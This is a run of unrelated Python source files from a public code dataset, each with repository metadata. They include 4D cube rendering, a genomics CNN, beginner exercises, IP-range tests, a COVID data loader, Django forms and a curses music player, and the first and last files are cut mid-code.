c1.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c2.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c2.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c3.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c3.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c4.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c4.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c5.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c5.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c6.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c6.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n c7.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c6.key, c7.key)\n fc1 = c6.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c7.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c6.cube_center)\n\n tf.plot(draw, r, persp=persp, rgba=(120, 23, 110, 30))\n im.save(\"Images//RotatingCube//im\" +\n str(i).rjust(4, '0') +\n \".png\")\n\n\ndef open_tsrct_proper(adj=None):\n for i in range(11):\n tt = TsrctCubeTree()\n if adj is not None:\n tt.adj = adj\n tt.bfs('000-')\n tt.reset_vert_col()\n tt.theta = np.pi/20.0*i\n tt.dfs_flatten('000-')\n im = Image.new(\"RGB\", (512, 512), (255, 255, 255))\n draw = ImageDraw.Draw(im, 'RGBA')\n r=rotation(4, np.pi*17/60.0)\n tt.plot(draw, r, rgba=(100,100,100,40))\n im.save(\"Images//RotatingCube//im\" +\n str(i).rjust(4, '0') +\n \".png\")\n\n\ndef tst():\n for i in range(31):\n tt = TsrctCubeTree()\n tt.adj = {\n '000-':['-000','+000','00-0','00+0'],\n '00-0':['0+00','000+'],\n '00+0':['0-00']\n }\n tt.bfs('000-')\n tt.reset_vert_col()\n tt.theta = min(np.pi/20.0*i, np.pi/2)\n tt.dfs_flatten('000-')\n im = Image.new(\"RGB\", (512, 512), (255, 255, 255))\n draw = ImageDraw.Draw(im, 'RGBA')\n r=np.eye(4)\n r2_3d = axis_rotation(np.array([0,0,0]), np.array([1,1,1]),\n np.pi/4+2*np.pi/20.0*i)[:3,:3]\n r[:3,:3] = r2_3d\n tt.plot(draw, r, rgba=(100,100,100,40))\n tt.cube_map['0-00'].plot_perspective(draw, r, 5,\n rgba=(255,0,0,50), \n shift=np.array([256, 256, 0, 0]),\n scale=35)\n tt.cube_map['0+00'].plot_perspective(draw, r, 5,\n rgba=(0,255,0,50),\n shift=np.array([256, 256, 0, 0]),\n scale=35)\n tt.cube_map['-000'].plot_perspective(draw, r, 5,\n rgba=(255,255,0,50),\n shift=np.array([256, 256, 0, 0]),\n scale=35)\n tt.cube_map['+000'].plot_perspective(draw, r, 5,\n rgba=(255,255,0,50),\n shift=np.array([256, 256, 0, 0]),\n scale=35)\n im.save(\"Images//RotatingCube//im\" +\n str(i).rjust(4, '0') +\n \".png\")\n\n","repo_name":"ryu577/pyray","sub_path":"pyray/shapes/fourd/tsrct_cube_graph.py","file_name":"tsrct_cube_graph.py","file_ext":"py","file_size_in_byte":12783,"program_lang":"python","lang":"en","doc_type":"code","stars":715,"dataset":"github-code","pt":"5"} +{"seq_id":"29911873252","text":"\"\"\"A module for compiling a deep, residual CNN.\"\"\"\nimport numpy as np\n\nfrom Bio.motifs import minimal\nfrom tensorflow.keras import backend, layers, models, utils\n\n\ndef make_res_network(shape: tuple[int, int]):\n \"\"\"Makes deep, residual network.\"\"\"\n input_bases, _ = shape\n\n inputs = layers.Input(shape=shape)\n x = layers.Conv1D(32, 1)(inputs)\n\n # 100 = ([2*(6-1)*1] * 5)\n # 500 = ([2*(6-1)*1] * 10) + ([2*(6-1)*4] * 10)\n # 1500 = ([2*(6-1)*1] * 10) + ([2*(6-1)*4] * 10) + ([2*(6-1)*10] * 10)\n\n if input_bases > 99:\n for _ in range(10):\n x = _make_res_block(x, filters=32, kernel_size=6, dilation_rate=1)\n\n if input_bases > 499:\n for _ in range(10):\n x = _make_res_block(x, filters=32, kernel_size=6, dilation_rate=4)\n\n if input_bases > 1499:\n for _ in range(10):\n x = _make_res_block(x, filters=32, kernel_size=6, dilation_rate=10)\n\n x = layers.Flatten()(x)\n x = layers.Dense(1, activation='sigmoid')(x)\n\n res_net = models.Model(inputs, x)\n res_net.compile(\n optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['acc', 'AUC']\n )\n\n return res_net\n\n\ndef _make_res_block(x, filters, kernel_size, dilation_rate):\n \"\"\"Makes residual block.\"\"\"\n shortcut = x\n\n x = layers.BatchNormalization()(x)\n x = layers.ReLU()(x)\n x = layers.Conv1D(\n filters, kernel_size, dilation_rate=dilation_rate, padding='same')(x)\n\n x = layers.BatchNormalization()(x)\n x = layers.ReLU()(x)\n x = layers.Conv1D(\n filters, kernel_size, dilation_rate=dilation_rate, padding='same')(x)\n\n x = layers.add([x, shortcut])\n\n return x\n\n\ndef one_hot_encode(seq) -> np.ndarray:\n \"\"\"Return a one-hot encoded representation of a genomic sequence.\"\"\"\n base_map = {'A': 0, 'C': 1, 'G': 2, 'T': 3, 'N': 4}\n int_seq = [base_map[base] for base in seq]\n\n return utils.to_categorical(int_seq, num_classes=5)[:, :-1]\n\n\ndef viz_conv_net(model_path, x_data_path, save_path):\n \"\"\"Visualizes the 1st layer of a convolutional neural network.\n \"\"\"\n model = models.load_model(model_path)\n x_data = np.load(x_data_path)\n\n conv_layer1 = model.get_layer(model.layers[4].name)\n num_motifs = conv_layer1.filters\n\n window = conv_layer1.kernel_size[0]\n func = backend.function(\n [model.inputs[0]],\n [backend.max(conv_layer1.output, axis=1),\n backend.argmax(conv_layer1.output, axis=1)]\n )\n\n max_acts, max_inds = func([x_data])\n\n motifs = np.zeros((num_motifs, window, 4))\n nsites = np.zeros(num_motifs)\n\n for m in range(num_motifs):\n for n in range(len(x_data)):\n if max_acts[n, m] > 0.0:\n if len(x_data[n, max_inds[n, m]:max_inds[n, m] + window]) == 6:\n nsites[m] += 1\n motifs[m] += x_data[\n n, max_inds[n, m]:max_inds[n, m] + window]\n\n with open(save_path, 'w') as file:\n file.write(\n \"MEME version 5.3.3\\n\\n\"\n \"ALPHABET= ACGT\\n\\n\"\n \"Background letter frequencies (from uniform background):\\n\"\n \"A 0.25 C 0.25 G 0.25 T 0.25\\n\\n\")\n\n for m in range(num_motifs):\n if nsites[m] == 0:\n continue\n\n file.write(\n f\"MOTIF {m}\\n\"\n f\"letter-probability matrix: \"\n f\"alength= 4 w= {window} \"\n f\"nsites= {int(nsites[m])} \"\n f\"E= 0.00\\n\"\n )\n\n for n in range(window):\n adenine, cytosine, guanine, thymine = tuple(\n motifs[m, n, 0:4] / np.sum(motifs[m, n, 0:4]))\n\n file.write(\n f\"{adenine:.6f} \"\n f\"{cytosine:.6f} \"\n f\"{guanine:.6f} \"\n f\"{thymine:.6f}\\n\"\n )\n\n file.write(\"\\n\")\n","repo_name":"fiszbein-lab/hybrid_exons","sub_path":"res_net.py","file_name":"res_net.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28855609785","text":"# # for x in 'hello':\n# # print(x.upper())\n# #\n# # for y in [1, 2, 3, 4]:\n# # print(y **2)\n#\n# # for num1 in range(10):\n# # for num2 in range(10):\n# # for num3 in range(10):\n# # for num4 in range(10):\n# # print(num1, num2, num3, num4)\n#\n# squares = []\n# cubes = []\n# for num in range(101):\n# squares.append(([num, num ** 2, num **3]))\n# cubes.append((num, num ** 3))\n# print(squares)\n#\n# for pair in squares:\n# print(f'Square of {pair[0]} is {pair[1]}')\n\n# people = (['Jack', 'Smith', 25], ['Mary', 'Gold', 20], ['Bob', 'Dylan', 45])\n# for name, surname, age in people:\n# result = f'Hello {name} {surname}. You are {age} years old.'\n# if age < 18:\n# result += ' You are teenager.'\n# else:1\n# result += 'You are adult.'\n# print(result)\n\n# x = 0\n# while x < 100:\n# print(x)\n# x +=1\n\n# step_len = 0.8\n# current_position = 0\n# total_steps = 0\n# distance_to_target = float(input('How many km you want to travel: ')) * 1000\n# while current_position < distance_to_target:\n# current_position += step_len\n# total_steps += 1\n#\n# print(total_steps)\n#\n# x = 0\n# while True:\n# if x > 10:\n# break\n# print(x)\n# x += 1\n#\n# for letter in 'python':\n# if letter == 'h':\n# continue\n# elif letter == 'n':\n# break\n# print(letter)\n\n# user_choice = input('Please ')\n# if user_choice == '1':\n# pass\n# elif user_choice == '2'\n# pass\n\n#38803160272\nwhile True:\n user_input = input('Please enter ID code or type \"exit\": ')\n if user_input.lower() == 'exit':\n break\n try:\n int(user_input)\n if len(user_input) != 11:\n raise UserWarning\n except ValueError:\n print('ID code is not numeric!')\n except UserWarning:\n if len(user_input) > 11:\n print('Code is too long!')\n else:\n print('Code is too short!')\n else:\n while True:\n user_choice = input('Please choose\\n'\n '1.Gender\\n'\n '2.Date of birth\\n' #dd.mm.yyyy\n '3.Region\\n'\n '4.Validate\\n'\n '5.Change ID\\n'\n '0.Exit\\n'\n '--> ')\n if user_choice == '1':\n if user_input[0] not in '09':\n if int(user_input[0]) % 2 == 0:\n print('You are female!')\n else:\n print('You are male!')\n elif user_choice == '2':\n f_year = user_input[1] + user_input[2]\n year = '19' + f_year\n day = user_input[5] + user_input[6]\n f_month = user_input[3] + user_input[4]\n print(day + ':' + f_month + ':' + year)\n elif user_choice == '3':\n pass\n elif user_choice == '4':\n pass\n elif user_choice == '5':\n break\n elif user_choice == '0':\n quit()\n else:\n print('Choise is out of range!')\n","repo_name":"SpektraQA/auto_home.py","sub_path":"course/001_simple/004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14421516323","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"recmetrics-pyspark\",\n version=\"0.0.1\",\n author=\"Camilo Akimushkin Valencia\",\n author_email=\"camilo.akimushkin@gmail.com\",\n description=\"A library of recommender systems metrics for big data\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/camiloakv/recmetrics-pyspark\",\n packages=[\"recmetrics_pyspark\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"camiloakv/recmetrics-pyspark","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"582942948","text":"import os\r\nfrom pathlib import Path\r\nfrom ipaddress import IPv4Network\r\nfrom urllib.request import urlretrieve\r\n\r\nimport pytest\r\n\r\nfrom ips import ServiceIPRange, parse_ipv4_service_ranges, get_aws_service_range\r\n\r\nURL = \"https://bites-data.s3.us-east-2.amazonaws.com/ip-ranges.json\"\r\nTMP = os.getenv(\"TMP\", \"/tmp\")\r\nPATH = Path(TMP, \"ip-ranges.json\")\r\nIP = IPv4Network(\"192.0.2.8/29\")\r\n\r\n\r\n@pytest.fixture(scope=\"module\")\r\ndef json_file():\r\n \"\"\"Import data into tmp folder\"\"\"\r\n urlretrieve(URL, PATH)\r\n return PATH\r\n\r\n\r\n@pytest.fixture(scope=\"module\")\r\ndef service_ranges():\r\n service = \"CLOUD9\"\r\n region = \"eu-west-1\"\r\n CIDRS = [\r\n \"10.1.18.0/24\",\r\n \"192.168.1.0/27\",\r\n \"192.0.2.8/29\",\r\n \"192.168.1.0/24\"\r\n ]\r\n\r\n return [\r\n ServiceIPRange(\r\n service=service,\r\n region=region,\r\n cidr=IPv4Network(cidr)\r\n )\r\n for cidr in CIDRS\r\n ] \r\n\r\n\r\ndef test_parse_ip4_service_ranges(json_file):\r\n service_ranges = parse_ipv4_service_ranges(json_file)\r\n assert len(service_ranges) == 1886\r\n assert isinstance(service_ranges, list)\r\n assert isinstance(service_ranges[0], ServiceIPRange)\r\n\r\n\r\ndef test_ServiceIPRange_string_representaiton():\r\n service = \"CLOUD9\"\r\n region = \"eu-west-1\"\r\n cidr = IP\r\n\r\n expected = f\"{cidr} is allocated to the {service} service in the {region} region\"\r\n assert str(ServiceIPRange(service, region, cidr)) == expected\r\n\r\n\r\ndef test_invalid_ip_address():\r\n service = \"CLOUD9\"\r\n region = \"eu-west-1\"\r\n cidr = IP\r\n invalid_ip = \"192.0.2.9/24\" # Invalid IP. This is a valid CIDR\r\n\r\n service_ranges = [ServiceIPRange(service, region, cidr)]\r\n with pytest.raises(ValueError) as exc:\r\n get_aws_service_range(invalid_ip, service_ranges)\r\n\r\n assert str(exc.value) == \"Address must be a valid IPv4 address\"\r\n\r\n\r\ndef test_ipv4_address_in_service_ranges(service_ranges):\r\n actual = get_aws_service_range(\"10.1.18.15\", service_ranges)\r\n expected = [service_ranges[0]]\r\n assert actual == expected\r\n\r\n # 192.168.1.16 is in the subnect of both\r\n # 192.168.1.0/27 and 192.168.1.0/24\r\n actual = get_aws_service_range(\"192.168.1.16\", service_ranges)\r\n expected = [service_ranges[1], service_ranges[3]]\r\n assert actual == expected\r\n\r\n\r\ndef test_ip4_address_not_in_service_ranges(service_ranges):\r\n # 192.0.2.16 is outside 192.0.2.8/29\r\n # 192.0.2.8/29 : 192.0.2.8 - 192.0.2.7\r\n assert not get_aws_service_range(\"192.0.2.16\", service_ranges)\r\n\r\n # 192.168.1.33/27 is outside 192.168.1.0/27\r\n # 192.168.1.0/27 : 192.168.1.0 - 192.168.1.31\r\n assert not get_aws_service_range(\"192.168.2.33\", service_ranges)\r\n\r\n","repo_name":"realnitinworks/bitesofpy","sub_path":"243/test_ips.py","file_name":"test_ips.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35635813776","text":"import heapq\n\nimport util\n\n\n@util.apply(sorted)\ndef control():\n for a in range(10, 100):\n for b in range(10, a + 1):\n yield a * b, b, a\n\n\ndef strat1():\n a = 10\n b = 10\n cache = {a: (b, a * b)}\n max_key = a\n\n while True:\n a, (b, prod) = min(cache.items(), key=lambda item: item[1][1])\n if a == max_key:\n max_key += 1\n cache[max_key] = (\n max_key, max_key * max_key,\n )\n yield prod, a, b\n cache[a] = (b + 1, a * (b + 1))\n\n\ndef strat2():\n a = 10\n b = 10\n cache = [(a * b, a, b)]\n max_key = a\n\n while True:\n prod, a, b = heapq.heappop(cache)\n if a == max_key:\n max_key += 1\n heapq.heappush(cache, (max_key * max_key, max_key, max_key))\n yield prod, a, b\n b += 1\n heapq.heappush(cache, (a * b, a, b))\n\n# ---\n\ndef compare_strats(*strat_fns):\n import more_itertools\n\n for iteration_results in zip(*(fn() for fn in strat_fns)):\n print(iteration_results)\n if not more_itertools.all_equal(ab for ab, _, _ in iteration_results):\n break\n\n\ndef main(strat):\n for ab, a, b in strat():\n print(ab, a, b)\n\n\nif __name__ == '__main__':\n # compare_strats(control, strat1, strat2)\n main(strat2)\n","repo_name":"orez-/python-sundry","sub_path":"ordered_product.py","file_name":"ordered_product.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26636784713","text":"import sys\n\nfrom datetime import datetime\n\nfrom .DL import DelhiDB\nfrom .GA import GoaDB\nfrom .HR import HaryanaDB\nfrom .KA import KarnatakaDB\nfrom .KL import KeralaDB\nfrom .MH import MaharashtraDB\nfrom .MP import MadhyaPradeshDB\nfrom .PB import PunjabDB\nfrom .TG import TelanganaDB\nfrom .TN import TamilNaduDB\nfrom .UK import UttarakhandDB\nfrom .WB import WestBengalDB\n\nfrom .Metadata import MetadataDB\n\nclass DBMain(object):\n\n def __init__(self, datadir):\n self.datadir = datadir\n\n self.setup_tables()\n self.record_table_metadata()\n\n def setup_tables(self):\n\n self.states = {\n 'DL': DelhiDB(datadir=self.datadir),\n 'GA': GoaDB(datadir=self.datadir),\n 'HR': HaryanaDB(datadir=self.datadir),\n 'KA': KarnatakaDB(datadir=self.datadir),\n 'KL': KeralaDB(datadir=self.datadir),\n 'MH': MaharashtraDB(datadir=self.datadir),\n 'MP': MadhyaPradeshDB(datadir=self.datadir),\n 'PB': PunjabDB(datadir=self.datadir),\n 'TG': TelanganaDB(datadir=self.datadir),\n 'TN': TamilNaduDB(datadir=self.datadir),\n 'UK': UttarakhandDB(datadir=self.datadir),\n 'WB': WestBengalDB(datadir=self.datadir),\n }\n\n self.metatable = MetadataDB(datadir=self.datadir)\n\n def insert_for_state(self, state, data):\n\n obj = self.states[state]\n obj.insert_row(data)\n\n def insert_metadata(self, data):\n self.metatable.insert_row(data)\n\n def record_table_metadata(self):\n \"\"\" Record all the state tables information in the database \"\"\"\n\n for state_name, db_obj in self.states.items():\n for tableobj in db_obj.tables.values():\n\n datum = {\n 'table_name': tableobj.table_name,\n 'state': state_name,\n 'description': tableobj.table_desc\n }\n\n row = {'table-overview': datum}\n self.insert_metadata(row)\n\n def record_bulletin_links(self, data):\n \"\"\" Record all the bulletins link in the database \"\"\"\n\n for state_name, linkdata in data.items():\n for datestr, href in linkdata.items():\n tablerow = {\n 'date': datestr,\n 'state': state_name,\n 'bulletin_link': href\n }\n row = {'bulletin-links': tablerow}\n self.insert_metadata(row)\n\n def record_db_metadata(self):\n \"\"\" Record DB Metadata \"\"\"\n\n # Store last updated\n currtime = datetime.now()\n timestr = f'{currtime.year}-{currtime.month:02d}-{currtime.day:02d}'\n tablerow = {'key': 'last-updated', 'value': timestr}\n row = {'db-properties': tablerow}\n self.insert_metadata(row)\n\n\nif __name__ == '__main__':\n datadir = str(sys.argv[1])\n obj = DBMain(datadir)\n","repo_name":"IBM/covid19-india-data","sub_path":"data_extractor/db/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"5"} +{"seq_id":"33446022158","text":"# General\nINTERVAL_WAKE_SENSOR = int(5 * 60 * 1000)\nNUM_READINGS_FILTER = 5\nSLEEP_SAMPLING = 1.1\nPRINT_ENABLE = False\nSEND_TO_DB = False\nCHANGE_MAC = False\nWDT_WAIT = 1000 * 30\nWIFI_WAIT = 1000 * 20\n\n# URL for DB API write operation\nURL = \"URL_to_influxdb_write_endpoint_here\"\nJWT_TOKEN = \"authorization_token_for_operation_above\"\n\n# Wi-fi\nNEW_MAC = None\nWIFI_SSID = \"wifi_ssid_here\"\nWIFI_PASSWORD = \"wifi_password_here\"\n\n# Pinout (GPIO numbering)\nPIN_LED_BLINKER = 2 # ESP32 D1 mini\nPIN_ADC_UV = 34 # ADC0 ESP32 D1 mini\nPIN_ADC_BATTERY = 35 # ADC1 ESP32 D1 mini\nPIN_POWER_SENSOR = 27 # pin used to temporarily provide power to UV sensor\nPIN_CHECK_FOR_WEBREPL = 21\nPIN_TRIGGER_WEBREPL = 17\n\n# Sensor V to UV index lookup table\nuv_index_table = [\n [1, 0.227],\n [2, 0.318],\n [3, 0.408],\n [4, 0.503],\n [5, 0.606],\n [6, 0.696],\n [7, 0.795],\n [8, 0.881],\n [9, 0.976],\n [10, 1.079],\n [11, 1.170]\n]\n\n","repo_name":"bandaangosta/uv_station","sub_path":"src/station_uv/config_general.py","file_name":"config_general.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35283456147","text":"def akkerman_fun(m, n):\n if m == 0:\n return n + 1\n elif m > 0 and n == 0:\n return akkerman_fun(m - 1, 1)\n elif m > 0 and n > 0:\n return akkerman_fun(m - 1, akkerman_fun(m, n - 1))\n\n\ndef akkerman_lesson():\n print('lesson-2')\n m_n = [[0, 1], [1, 1], [2, 1], [3, 4]]\n for m, n in m_n:\n print(f'Result for akkerman({m}, {n}): {akkerman_fun(m, n)}')\n\n\ndef easy_numbers_lesson():\n n_count = 80\n numbers = set(range(2, n_count + 1))\n easy_numbers = numbers.copy()\n\n for number in numbers:\n first = True\n for next_number in range(number, n_count + 1, number):\n if first:\n first = False\n else:\n if next_number in easy_numbers:\n easy_numbers.remove(next_number)\n\n easy_numbers = sorted(set(easy_numbers))\n print(list(easy_numbers))\n\n\ndef evclidus_lesson():\n a = 3480\n b = 17400\n max_num = max(a, b)\n min_num = min(a, b)\n\n left = max_num % min_num\n\n while left != 0:\n max_num = min_num\n min_num = left\n left = max_num % min_num\n\n print(f\"Наибольший общий делитель = {min_num}\")\n\n\ndef evclidus_recursion_lesson():\n\n def evclidus(min, max):\n left = max % min\n if left == 0:\n return min\n else:\n return evclidus(left, min)\n\n max = 17400\n min = 3480\n\n print(evclidus(min, max))\n\n\nif __name__ == '__main__':\n # akkerman_lesson()\n # easy_numbers_lesson()\n # evclidus_lesson()\n evclidus_recursion_lesson()\n","repo_name":"kineugene/lessons-algorithms","sub_path":"lesson-2/lesson.py","file_name":"lesson.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38935260266","text":"from django import forms\nfrom .models import AluFileTermo,CharacteristikaFile\n\n\nclass FileFormTermo(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(FileFormTermo, self).__init__(*args, **kwargs)\n self.fields['file'].widget.attrs.update({\n 'class': 'form-control-file'\n })\n class Meta:\n model =AluFileTermo\n fields =['file','file_type']\n\nclass FileFormChar(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(FileFormChar, self).__init__(*args, **kwargs)\n self.fields['file'].widget.attrs.update({\n 'class': 'form-control-file'\n })\n class Meta:\n model =CharacteristikaFile\n fields =['file','file_type']","repo_name":"MuzaffarTursunov96/akfa_project","sub_path":"aluminiytermo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6785267969","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n '''\n Given an array of strings, this groups the anagrams together in lists\n Returns a list of all grouped together anagrams\n '''\n dict = {}\n for word in strs:\n key = ''.join(sorted(word))\n if key not in dict:\n dict[key] = []\n dict[key].append(word)\n return dict.values()","repo_name":"Broadan26/LeetCodeGrind","sub_path":"group-anagrams/group-anagrams.py","file_name":"group-anagrams.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14499873243","text":"# -*- coding: utf-8 -*-\n\nimport curses\n\nfrom ..player.playlist import Playlist\nfrom ..player.track import Track\nfrom ..player.artist import Artist\nfrom ..player.album import Album\nfrom ..player.list import List\nfrom ..player.item import Item\n\n\nclass Question(object):\n\n def __init__(self, view, text, y, x):\n self._view = view\n self._text = text\n self._y = y\n self._x = x\n\n def display(self):\n curses.setsyx(self._y, self._x)\n self._view.scr.clrtoeol()\n self._view.string(self._text, 0, 0)\n curses.echo()\n curses.curs_set(1)\n self._view.scr.refresh()\n\n return self\n\n def response(self):\n response = self._view.scr.getstr(0, len(self._text) + 1)\n curses.noecho()\n curses.curs_set(0)\n\n return response\n\n\nclass View(object):\n\n def __init__(self, ui):\n self.ui = ui\n self.scr = ui.stdscr\n self.player = ui.player\n self.colors = ui.colors\n self.height, self.width = self.scr.getmaxyx()\n self.header_height = 2\n self.footer_height = 2\n self.viewheight = self.height - self.header_height - self.footer_height\n self.current = None\n self.previous = []\n self.item = 0\n self.current_item = None\n self._search_mode = False\n\n curses.curs_set(0)\n\n self.scr.timeout(17)\n\n @property\n def elements(self):\n if isinstance(self.current, List):\n elements = self.current.items\n elif isinstance(self.current, Artist):\n elements = self.current.albums\n elif isinstance(self.current, Playlist):\n elements = self.current.tracks\n else:\n elements = self.current[1]\n\n return elements\n\n def display(self):\n self.erase()\n if not self.in_search_mode():\n self.header()\n\n self.footer()\n\n self.main()\n self.refresh()\n\n def header(self):\n locstring = [('Melomaniac', 'blue')]\n for i in self.previous[1:]:\n i = i[0]\n locstring.append((' > ', 'header-sep'))\n if isinstance(i, Artist):\n locstring.append((i.name, 'cyan'))\n elif isinstance(i, Playlist):\n locstring.append((i.name, 'magenta'))\n elif isinstance(i, List):\n locstring.append((i.name, ''))\n elif isinstance(i, Item):\n locstring.append((i.name, ''))\n else:\n if isinstance(i, tuple):\n locstring.append((i[0], 'header-text'))\n else:\n locstring.append((i, 'header-text'))\n\n if self.previous:\n locstring.append((' > ', 'header-sep'))\n if isinstance(self.current, List):\n locstring.append((self.current.name, ''))\n elif isinstance(self.current, Item):\n locstring.append((self.current.name, ''))\n elif isinstance(self.current, Playlist):\n locstring.append((self.current.name, 'magenta'))\n elif isinstance(self.current, Artist):\n locstring.append((self.current.name, 'cyan'))\n else:\n locstring.append((self.current[0], 'header-text'))\n\n self.string(locstring, 0, 0)\n for i in range(0, self.width):\n self.scr.addch(1, i, '-')\n\n def footer(self):\n if self.player.track is not None:\n self.track_footer()\n else:\n for i in range(0, self.width):\n self.scr.addch(self.height - 10, i, ' ')\n\n self.string(self.player.status, self.height - 1, 0)\n\n def get_search(self):\n search = self.scr.getstr(0, 13)\n curses.noecho()\n curses.curs_set(0)\n\n return search\n\n def search_mode(self, search_mode):\n self._search_mode = search_mode\n\n #if search_mode is True:\n # curses.setsyx(0, 0)\n # self.scr.clrtoeol()\n # s = 'Search for: '\n # self.line(s, 0, len(s), color='blue')\n # curses.echo()\n # curses.curs_set(1)\n\n return self\n\n def in_search_mode(self):\n return self._search_mode\n\n def ask(self, y, x, question):\n return Question(self, question, y, x).display()\n\n def main(self):\n elements = self.elements\n\n count = len(elements)\n top_half = self.viewheight // 2\n bottom_half = self.viewheight - top_half\n if count <= self.viewheight:\n cl = 0\n elif (self.item - top_half) < 0:\n cl = 0\n elif (self.item + bottom_half) > (count - 1):\n cl = count - self.viewheight\n else:\n cl = self.item - top_half\n\n for i in range(cl, cl + self.viewheight):\n if i < count:\n element = elements[i]\n if isinstance(element, Playlist):\n if not element.name:\n continue\n\n s = ' {} '.format(element.name)\n elif isinstance(element, List):\n s = ' {} '.format(element.name)\n elif isinstance(element, Item):\n s = ' {} '.format(element.name)\n elif isinstance(element, Artist):\n s = ' {} '.format(element.name)\n elif isinstance(element, Track):\n if isinstance(self.current, Album):\n number = element.number\n s = ' {:3d}. {}'.format(number, element.title, element.artist)\n elif isinstance(self.current, Playlist):\n number = i + 1\n s = ' {:3d}. {} - {}'.format(number, element.title, element.artist)\n else:\n number = element.number\n s = ' {:3d}. {} - {}'.format(number, element.title, element.artist)\n\n max_song_width = self.width - 6\n s = s[:max_song_width] + ' ' * (self.width - 6 - len(s)) + element.duration_string + ' '\n\n if i == self.item:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width, self.colors.get('cyan_reverse'))\n elif self.player.track is not None and self.player.track.id == element.id:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width, self.colors.get('yellow'))\n else:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width)\n\n continue\n else:\n # Assuming main menu tuple\n s = element[0]\n\n slen = len(s)\n s = s + ' ' * (self.width - slen)\n try:\n if i == self.item:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width, self.colors.get('cyan_reverse'))\n else:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width)\n except curses.error:\n pass\n else:\n break\n\n def track_footer(self):\n done = int(self.width * self.player.track_percent / 100)\n for i in range(0, done):\n self.scr.addch(self.height - 2, i, '-', self.colors.get('green'))\n\n for i in range(done, self.width):\n self.scr.addch(self.height - 2, i, '-')\n\n self.string(\n [self.player.status, ' > ',\n (self.player.track.artist, 'cyan'), ' - ', (self.player.track.title, 'yellow')],\n self.height - 1, 0, self.width - 6)\n\n # Current time\n current_time = '{:02d}:{:02d}'.format(\n self.player.track_current // 60,\n self.player.track_current % 60\n )\n self.scr.addstr(\n self.height - 1, self.width - 6,\n current_time, self.colors.get('green')\n )\n\n def string(self, string, y, x, width=None):\n if width is None:\n width = self.width\n\n if not isinstance(string, (list, tuple)):\n string = [(string, '')]\n\n for i in string:\n if isinstance(i, str):\n s = i\n col = None\n else:\n s = i[0]\n if len(i) == 2:\n col = i[1]\n else:\n col = None\n\n if (self.width - x) > 0:\n if col and col in self.colors:\n self.scr.addnstr(y, x, s, width - x, self.colors.get(col))\n else:\n self.scr.addstr(y, x, s, width - x)\n\n x += len(s)\n\n def line(self, string, y, slen, width=None, color='white'):\n if width is None:\n width = self.width\n\n self.scr.addnstr(y, 0, string, width, self.colors.get(color))\n for i in range(slen, width):\n self.scr.addstr(y, slen, ' ')\n\n slen += 1\n\n def clear(self):\n self.scr.clear()\n\n def erase(self):\n 